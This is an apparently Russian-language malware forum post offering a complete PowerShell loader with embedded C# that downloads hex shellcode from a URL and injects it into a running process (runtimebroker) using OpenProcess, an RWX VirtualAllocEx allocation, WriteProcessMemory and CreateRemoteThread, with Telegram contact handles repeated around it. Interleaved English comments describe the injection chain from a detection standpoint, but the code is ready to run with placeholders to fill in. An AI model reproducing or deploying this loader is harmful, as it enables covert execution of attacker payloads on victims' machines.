Считывает шестнадцатеричный шелл-код с веб-страницы и выполняет его.
Для корректного разбора и выполнения скриптом шеллкод должен иметь такой формат: "E8 C0 A7 00 00 C0 A7 00 00 1C 61 48 9D 44 18 90 EB 6B D4 8D B1 34 EF B9 74 B3 92 58 8E BA 78 ED 40 3B"
Телеграм:
@RooseveltRow
@eby_usa
@malware_guru
@lazarus_bear
@HiddenCobra666
Для корректного разбора и выполнения скриптом шеллкод должен иметь такой формат: "E8 C0 A7 00 00 C0 A7 00 00 1C 61 48 9D 44 18 90 EB 6B D4 8D B1 34 EF B9 74 B3 92 58 8E BA 78 ED 40 3B"
Код:
# Loader script: compiles the embedded C# class below at run time with Add-Type and then calls its Main().
# Reviewer note (defensive reading): the P/Invoke chain inside that class - OpenProcess with
# PROCESS_ALL_ACCESS, VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, CreateRemoteThread -
# is the textbook remote-thread injection sequence, and the payload bytes are fetched from a URL at run time.
# Each of those steps (in-memory compilation from a script host, an RWX allocation in another process,
# a cross-process thread start) is the kind of event endpoint telemetry is commonly built to surface,
# so this page should be treated and catalogued as a malicious loader sample.
$csharpCode = @"
using System;
using System.Net.Http;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Net;
using System.Diagnostics;
using System.Linq;
namespace Inject
{
// Injection helper; its members are public/static so the PowerShell host can call Main() directly.
public class Program
{
// P/Invoke surface: the four kernel32 calls that make up the injection sequence in Main().
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, uint processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
// Full process-access rights plus an RWX page protection: two of the highest-signal values a monitor
// can observe on a remote allocation, and both are requested unconditionally here.
const uint PROCESS_ALL_ACCESS = 0x001F0FFF;
const uint MEM_COMMIT = 0x00001000;
const uint PAGE_EXECUTE_READWRITE = 0x40;
// Entry point. Resolves the target PID by name, fetches and parses the hex shellcode from the configured URL,
// then allocates RWX memory in the target, copies the bytes in and starts them on a new remote thread.
// Every failure path prints a message and returns; the process handle obtained from OpenProcess is never closed.
public static void Main()
{
string processName = "runtimebroker"; //replace with desired running process
string shellcodeUrl = "www.example.com/myshellcode.txt"; //replace with your url
uint pid = GetProcessId(processName);
if (pid == 0)
{
Console.WriteLine("Failed to find the process.");
return;
}
byte[] shellcode = DownloadShellcode(shellcodeUrl);
if (shellcode.Length == 0)
{
Console.WriteLine("Failed to download or parse shellcode.");
return;
}
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if (hProcess == IntPtr.Zero)
{
Console.WriteLine("Failed to open the target process.");
return;
}
IntPtr pShellcode = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pShellcode == IntPtr.Zero)
{
Console.WriteLine("Failed to allocate memory in the target process.");
return;
}
int lpNumberOfBytesWritten; // Declare the variable
if (!WriteProcessMemory(hProcess, pShellcode, shellcode, (uint)shellcode.Length, out lpNumberOfBytesWritten))
{
Console.WriteLine("Failed to write to the target process memory.");
return;
}
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, pShellcode, IntPtr.Zero, 0, IntPtr.Zero);
if (hThread == IntPtr.Zero)
{
int errorCode = Marshal.GetLastWin32Error();
Console.WriteLine("Failed to create a remote thread in the target process. Error Code: " + errorCode);
return;
}
Console.WriteLine("Shellcode injected successfully.");
}
// Looks up the first running process whose name matches processName (any extension stripped);
// returns 0 when no such process exists.
static uint GetProcessId(string processName)
{
string nameWithoutExtension = System.IO.Path.GetFileNameWithoutExtension(processName);
Process[] processes = Process.GetProcessesByName(nameWithoutExtension);
return processes.Length > 0 ? (uint)processes[0].Id : 0;
}
// Downloads the remote listing as text with a WebClient and converts it to bytes via ParseShellcode.
static byte[] DownloadShellcode(string url)
{
string shellcodeString = new WebClient().DownloadString(url);
return ParseShellcode(shellcodeString);
}
// Parses space-separated hexadecimal byte tokens (the format shown in the page header) into a byte array.
static byte[] ParseShellcode(string shellcodeString)
{
return shellcodeString.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries)
.Select(s => Convert.ToByte(s, 16))
.ToArray();
}
}
}
"@
# Assemblies passed to the compiler in addition to the defaults.
$assemblyReferences = @(
'System.Net.Http',
'System.Runtime.InteropServices'
)
# Compiles the class in memory and returns the resulting type; the on-the-fly compile from a script host
# is itself an observable event that monitoring typically records.
$addedType = Add-Type -TypeDefinition $csharpCode -Language CSharp -ReferencedAssemblies $assemblyReferences -PassThru
# Writes the compiled type object to the pipeline.
$addedType
# Invokes the injector's entry point.
$addedType::Main().Wait()
Телеграм:
@RooseveltRow
@eby_usa
@malware_guru
@lazarus_bear
@HiddenCobra666